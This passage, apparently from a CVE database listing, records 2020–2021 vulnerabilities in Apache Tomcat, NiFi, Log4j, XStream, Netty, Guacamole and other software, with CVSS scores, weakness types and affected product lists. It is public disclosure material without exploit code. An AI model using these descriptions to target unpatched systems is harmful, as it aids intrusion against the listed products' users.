Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-613,

Products Affected

Vendor Product Version
apache nifi_registry *
CVE-2020-9483 MEDIUM

**Resolved** When using H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through the GraphQL protocol has a SQL injection vulnerability, which allows access to unexpected data. The Apache SkyWalking 6.0.0 to 6.6.0 and 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache skywalking 7.0.0
apache skywalking *
CVE-2020-9484 MEDIUM

When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.0 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.0 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle siebel_apps_-_marketing *
oracle instantis_enterprisetrack *
oracle communications_session_route_manager *
opensuse leap 15.1
oracle database 12.2.0.1
mcafee epolicy_orchestrator 5.9.0
oracle workload_manager 18c
apache tomcat 10.0.0
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle hospitality_guest_access 4.2.1
oracle communications_diameter_signaling_router *
oracle managed_file_transfer 12.2.1.4.0
oracle workload_manager 12.2.0.1
oracle communications_session_report_manager *
apache tomcat *
fedoraproject fedora 32
mcafee epolicy_orchestrator 5.9.1
oracle agile_plm 9.3.3
oracle agile_plm 9.3.5
oracle agile_plm 9.3.6
oracle fmw_platform 12.2.1.4.0
oracle mysql_enterprise_monitor *
oracle hospitality_guest_access 4.2.0
oracle communications_cloud_native_core_binding_support_function 1.10.0
oracle communications_element_manager *
oracle communications_cloud_native_core_policy 1.14.0
oracle retail_order_broker 15.0
oracle siebel_ui_framework *
mcafee epolicy_orchestrator 5.10.0
oracle database 19c
debian debian_linux 9.0
oracle fmw_platform 12.2.1.3.0
oracle workload_manager 19c
debian debian_linux 8.0
oracle transportation_management 6.3.7
oracle communications_instant_messaging_server 10.0.1.4.0
canonical ubuntu_linux 16.04
fedoraproject fedora 31
oracle managed_file_transfer 12.2.1.3.0
oracle database 21c
canonical ubuntu_linux 20.04
apache tomcat 9.0.0
CVE-2020-9485 MEDIUM

An issue was found in Apache Airflow versions 1.10.10 and below. A stored XSS vulnerability was discovered in the Chart pages of the "classic" UI.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-9486 MEDIUM

In Apache NiFi 1.10.0 to 1.11.4, the NiFi stateless execution engine produced log output which included sensitive property values. When a flow was triggered, the flow definition configuration JSON was printed, potentially containing sensitive values in plaintext.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-532,

Products Affected

Vendor Product Version
apache nifi *
CVE-2020-9487 MEDIUM

In Apache NiFi 1.0.0 to 1.11.4, the NiFi download token (one-time password) mechanism used a fixed cache size and did not authenticate a request to create a download token, only when attempting to use the token to access the content. An unauthenticated user could repeatedly request download tokens, preventing legitimate users from requesting download tokens.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache nifi *
CVE-2020-9488 MEDIUM

Improper validation of certificate with host mismatch in the Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender. Fixed in Apache Log4j 2.12.3 and 2.13.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 3.7 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N 2.2 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
oracle insurance_rules_palette 11.0.2.25
oracle weblogic_server 10.3.6.0.0
oracle retail_eftlink 19.0.1
oracle communications_unified_inventory_management 7.4.0
oracle utilities_framework 4.4.0.0.0
oracle retail_bulk_data_integration 16.0.3.0
qos reload4j *
oracle storagetek_tape_analytics_sw_tool 2.3.1
oracle insurance_policy_administration_j2ee 10.2.4.12
oracle retail_xstore_point_of_service 18.0.3
oracle retail_xstore_point_of_service 16.0.6
oracle financial_services_price_creation_and_discovery 8.0.7
oracle insurance_policy_administration_j2ee 10.2.0.37
oracle enterprise_manager_for_peoplesoft 13.4.1.1
oracle insurance_rules_palette 11.1.0.15
oracle retail_predictive_application_server 16.0.3.0
oracle retail_order_broker_cloud_service 19.0
oracle communications_offline_mediation_controller 12.0.0.3.0
oracle retail_xstore_point_of_service 15.0.4
oracle financial_services_market_risk_measurement_and_management 8.0.6
oracle utilities_framework 2.2.0.0.0
oracle utilities_framework 4.2.0.2.0
oracle retail_integration_bus 16.0
oracle spatial_and_graph 19c
oracle storagetek_acsls 8.5.1
oracle retail_assortment_planning 16.0.3.0
oracle communications_application_session_controller 3.9m0p1
apache log4j *
oracle retail_order_broker_cloud_service 16.0
oracle flexcube_private_banking 12.0.0
oracle flexcube_core_banking 5.2.0
oracle financial_services_institutional_performance_analytics 8.7.0
debian debian_linux 11.0
oracle financial_services_market_risk_measurement_and_management 8.0.8
oracle retail_predictive_application_server 14.1.3.0
oracle insurance_rules_palette 10.2.4.12
oracle oracle_goldengate_application_adapters 19.1.0.0.0
oracle siebel_apps_-_marketing *
oracle retail_customer_management_and_segmentation_foundation 17.0
oracle retail_assortment_planning 15.0.3.0
oracle spatial_and_graph 12.2.0.1
oracle retail_eftlink 16.0.3
oracle retail_eftlink 15.0.2
oracle communications_billing_and_revenue_management 7.5.0.23.0
oracle retail_bulk_data_integration 15.0.3.0
oracle policy_automation_connector_for_siebel 10.4.6
oracle retail_customer_management_and_segmentation_foundation 18.0
oracle data_integrator 12.2.1.4.0
oracle financial_services_market_risk_measurement_and_management 8.1.0
oracle utilities_framework 4.2.0.3.0
oracle retail_order_broker_cloud_service 19.2
oracle flexcube_core_banking *
oracle insurance_rules_palette 11.2.0.26
oracle peoplesoft_enterprise_peopletools 8.57
oracle insurance_policy_administration_j2ee 11.0.2.25
oracle siebel_ui_framework *
oracle communications_services_gatekeeper 7.0
oracle insurance_insbridge_rating_and_underwriting 5.6.1.0
debian debian_linux 9.0
oracle retail_advanced_inventory_planning 14.1
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle retail_eftlink 17.0.2
oracle financial_services_institutional_performance_analytics 8.0.6
oracle insurance_insbridge_rating_and_underwriting *
oracle retail_predictive_application_server 15.0.3.0
oracle primavera_unifier 19.12
oracle retail_order_broker_cloud_service 19.1
oracle spatial_and_graph 18c
oracle financial_services_price_creation_and_discovery 8.0.6
oracle retail_customer_management_and_segmentation_foundation 19.0
oracle flexcube_private_banking 12.1.0
oracle utilities_framework 4.4.0.2.0
oracle communications_eagle_ftp_table_base_retrieval 4.5
oracle financial_services_retail_customer_analytics 8.0.6
oracle policy_automation_for_mobile_devices *
oracle financial_services_analytical_applications_infrastructure *
oracle communications_unified_inventory_management 7.3.0
debian debian_linux 10.0
oracle utilities_framework *
oracle insurance_policy_administration_j2ee 11.2.0.26
oracle peoplesoft_enterprise_peopletools 8.58
oracle policy_automation *
oracle health_sciences_information_manager 3.0.1
oracle jd_edwards_world_security a9.4
oracle retail_customer_management_and_segmentation_foundation 16.0
oracle communications_billing_and_revenue_management 12.0.0.3.0
oracle retail_order_broker_cloud_service 19.3
oracle retail_insights_cloud_service_suite 19.0
oracle retail_integration_bus 14.1
oracle retail_xstore_point_of_service 19.0.2
oracle retail_eftlink 18.0.1
oracle retail_integration_bus 15.0
oracle peoplesoft_enterprise_peopletools 8.56
oracle retail_order_broker_cloud_service 18.0
oracle financial_services_institutional_performance_analytics 8.1.0
oracle insurance_rules_palette 10.2.0.37
oracle insurance_policy_administration_j2ee 11.1.0.15
oracle data_integrator 12.2.1.3.0
CVE-2020-9489 MEDIUM

A carefully crafted or corrupt file may trigger a System.exit in Tika's OneNote Parser. Crafted or corrupted files can also cause out of memory errors and/or infinite loops in Tika's ICNSParser, MP3Parser, MP4Parser, SAS7BDATParser, OneNoteParser and ImageParser. Apache Tika users should upgrade to 1.24.1 or later. The vulnerabilities in the MP4Parser were partially fixed by upgrading the com.googlecode:isoparser:1.1.22 dependency to org.tallison:isoparser:1.9.41.2. For unrelated security reasons, we upgraded org.apache.cxf to 3.3.6 as part of the 1.24.1 release.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache tika 1.24
oracle primavera_unifier 19.12
oracle primavera_unifier 16.2
oracle webcenter_portal 12.2.1.3.0
oracle primavera_unifier *
oracle primavera_unifier 18.8
oracle primavera_unifier 16.1
oracle webcenter_portal 12.2.1.4.0
oracle communications_messaging_server 8.1
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
CVE-2020-9490 MEDIUM

Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in an HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.04
redhat enterprise_linux_eus 8.2
redhat enterprise_linux_server_update_services_for_sap_solutions 8.4
oracle enterprise_manager_ops_center 12.4.0.0
redhat enterprise_linux_for_ibm_z_systems_eus 8.2
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.1
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.3
redhat enterprise_linux_server_tus 8.6
redhat enterprise_linux_for_power_little_endian_eus 8.1
redhat enterprise_linux_for_power_little_endian 8.0
redhat enterprise_linux 8.0
redhat enterprise_linux_eus 8.4
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.4
canonical ubuntu_linux 16.04
redhat enterprise_linux_server_update_services_for_sap_solutions 8.6
redhat enterprise_linux_for_power_little_endian_eus 8.2
apache http_server *
oracle communications_session_route_manager *
redhat enterprise_linux_for_ibm_z_systems_eus 8.6
opensuse leap 15.1
redhat enterprise_linux_for_power_little_endian_eus 8.4
oracle instantis_enterprisetrack 17.1
debian debian_linux 10.0
redhat enterprise_linux_server_update_services_for_sap_solutions 8.1
oracle communications_session_report_manager *
fedoraproject fedora 32
redhat enterprise_linux_server_tus 8.4
redhat openstack_for_ibm_power 16.1
redhat enterprise_linux_for_ibm_z_systems_eus 8.1
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.2
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.6
redhat openstack 16.1
oracle communications_element_manager *
redhat enterprise_linux_for_ibm_z_systems 8.0
redhat enterprise_linux_for_ibm_z_systems_eus 8.4
redhat enterprise_linux_server_aus 8.6
oracle hyperion_infrastructure_technology 11.1.2.4
opensuse leap 15.2
redhat enterprise_linux_eus 8.6
redhat enterprise_linux_eus 8.1
redhat enterprise_linux_server_update_services_for_sap_solutions 8.2
redhat enterprise_linux_for_power_little_endian_eus 8.6
fedoraproject fedora 31
canonical ubuntu_linux 20.04
redhat enterprise_linux_server_aus 8.4
redhat enterprise_linux_server_aus 8.2
redhat enterprise_linux_server_tus 8.2
oracle instantis_enterprisetrack 17.2
redhat software_collections 1.0
CVE-2020-9491 MEDIUM

In Apache NiFi 1.2.0 to 1.11.4, the NiFi UI and API were protected by mandating TLS v1.2, as were listening connections established by processors like ListenHTTP, HandleHttpRequest, etc. However, intracluster communication such as cluster request replication, Site-to-Site, and load balanced queues continued to support TLS v1.0 or v1.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-327,

Products Affected

Vendor Product Version
apache nifi *
CVE-2020-9492 MEDIUM

In Apache Hadoop 3.2.0 to 3.2.1, 3.0.0-alpha1 to 3.1.3, and 2.0.0-alpha to 2.10.0, WebHDFS client might send SPNEGO authorization header to remote URL without proper verification.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache solr 8.6.0
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
apache solr 8.6.2
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
apache hadoop *
CVE-2020-9493 MEDIUM

A deserialization flaw was found in Apache Chainsaw versions prior to 2.1.0 which could lead to malicious code execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache chainsaw *
qos reload4j *
apache log4j *
CVE-2020-9494 MEDIUM

Apache Traffic Server 6.0.0 to 6.2.3, 7.0.0 to 7.1.10, and 8.0.0 to 8.0.7 is vulnerable to certain types of HTTP/2 HEADERS frames that can cause the server to allocate a large amount of memory and spin the thread.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2020-9495 MEDIUM

Apache Archiva login service before 2.2.5 is vulnerable to LDAP injection. An attacker is able to retrieve user attribute data from the connected LDAP server by providing special values to the login form. With certain characters it is possible to modify the LDAP filter used to query the LDAP users. By measuring the response time for the login request, arbitrary attribute data can be retrieved from LDAP user objects.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache archiva *
CVE-2020-9496 MEDIUM

XML-RPC requests are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-502,

Products Affected

Vendor Product Version
apache ofbiz 17.12.03
CVE-2020-9497 LOW

Apache Guacamole 1.1.0 and older do not properly validate data received from RDP servers via static virtual channels. If a user connects to a malicious or compromised RDP server, specially-crafted PDUs could result in disclosure of information within the memory of the guacd process handling the connection.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.4 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N 0.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
fedoraproject fedora 32
debian debian_linux 9.0
apache guacamole *
fedoraproject fedora 33
CVE-2020-9498 MEDIUM

Apache Guacamole 1.1.0 and older may mishandle pointers involved in processing data received via RDP static virtual channels. If a user connects to a malicious or compromised RDP server, a series of specially-crafted PDUs could result in memory corruption, possibly allowing arbitrary code to be executed with the privileges of the running guacd process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.7 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H 0.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
fedoraproject fedora 32
debian debian_linux 9.0
apache guacamole *
fedoraproject fedora 33
CVE-2021-20190 HIGH

A flaw was found in jackson-databind before 2.9.10.7. FasterXML mishandles the interaction between serialization gadgets and typing. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
netapp active_iq_unified_manager -
debian debian_linux 9.0
netapp oncommand_insight -
netapp service_level_manager -
apache nifi *
oracle commerce_guided_search_and_experience_manager 11.3.2
fasterxml jackson-databind *
netapp oncommand_api_services -
CVE-2021-21295 LOW

Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec` and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1, this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is an HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final. As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-444,

Products Affected

Vendor Product Version
apache zookeeper 3.5.9
debian debian_linux 10.0
netty netty *
netapp oncommand_workflow_automation -
quarkus quarkus *
oracle communications_cloud_native_core_policy 1.14.0
apache kudu *
netapp oncommand_api_services -
CVE-2021-21315 MEDIUM

The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. The problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... only allow strings, reject any arrays. String sanitation works as expected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N 2.5 4.0
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache cordova 10.0.0
systeminformation systeminformation *
CVE-2021-21341 HIGH

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system, depending on CPU type or parallel execution of such a payload, resulting in a denial of service only by manipulating the processed input stream. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
security-advisories@github.com 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-502,

Products Affected

Vendor Product Version
oracle webcenter_portal 11.1.1.9.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21342 MEDIUM

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream therefore creates new instances based on this type information. An attacker can manipulate the processed input stream and replace or inject objects that result in a server-side request forgery. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N 1.6 3.6
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,CWE-918,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle communications_brm_-_elastic_charging_engine 12.0.0.3
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21343 MEDIUM

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream therefore creates new instances based on this type information. An attacker can manipulate the processed input stream and replace or inject objects that result in the deletion of a file on the local host. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N 1.6 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-73,CWE-502,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_platform 2.7.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
fedoraproject fedora 33
CVE-2021-21344 HIGH

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9
security-advisories@github.com 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N 1.6 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-434,CWE-502,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_virtual_account_management 14.2.0
oracle communications_unified_inventory_management 7.3.4
debian debian_linux 10.0
oracle communications_unified_inventory_management 7.4.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 35
oracle communications_unified_inventory_management 7.3.2
xstream_project xstream *
fedoraproject fedora 34
netapp oncommand_insight -
oracle banking_platform 2.12.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3.0
apache jmeter *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
apache activemq 5.16.1
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_unified_inventory_management 7.3.5
apache activemq 5.16.0
oracle webcenter_portal 12.2.1.4.0
oracle business_activity_monitoring 12.2.1.3.0
oracle retail_xstore_point_of_service 19.0.2
debian debian_linux 11.0
oracle banking_platform 2.9.0
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
